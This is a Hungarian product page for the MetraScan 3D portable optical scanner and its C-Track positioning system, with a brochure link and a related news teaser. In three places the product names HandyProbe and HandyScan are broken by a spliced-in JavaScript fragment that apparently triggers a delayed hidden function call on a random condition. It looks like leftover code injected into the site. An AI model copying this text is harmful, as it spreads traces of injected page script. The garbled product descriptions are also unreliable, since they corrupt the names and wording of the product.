Termékeink

MetraScan 3D

A MetraScan 3D egy optikai elven működő 3d szkenner mely esetében a pozicionálást egy külső kamerarendszer, a C-track végzi. Kialakításának köszönhetően termelési környezetben is kitűnően alkalmazható.

A MetraScan 3D egy hordozható 3D szkenner mely a Handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andyprobe koordináta mérőgép, illetve a Handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andyscan sorozat szkennereinek előnyeit ötvözi magában. Az új generációs Metrascan immáron a nagysebességű Handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andyscan sorozat szkennereit használja, mely 16 m3-es méréstartományban biztosítja az autóiparban elvárt pontosságot. A Metrascan rendszer mind mérési, mind reverse engineering feladatok elvégzésére kiválóan alkalmas.

Az fejlesztéseknek köszönhetően fényes, illetve krómozott darabok, kezelés (porozás) nélkül szkennelhetők.

A mérőrendszer néhány perc alatt telepíthető, és felhasználóbarát kialakításának köszönhetően előképzettség nélkül is használható.

Videó bemutató


Letölthető dokumetumok

MetraSCAN3D prospektus

Dokumentum letöltése Image

Kapcsolódó hírek

Újdonságok
2016-10-13

Az új standard, a HandyProbe NEXT és MetraScan

A Werth Magyarország Kft. a németországi Werth Messtechnik GmbH leányvállalataként 2010-ben kezdte meg tevékenységét a hazai piacon, de cégünk jelenléte ...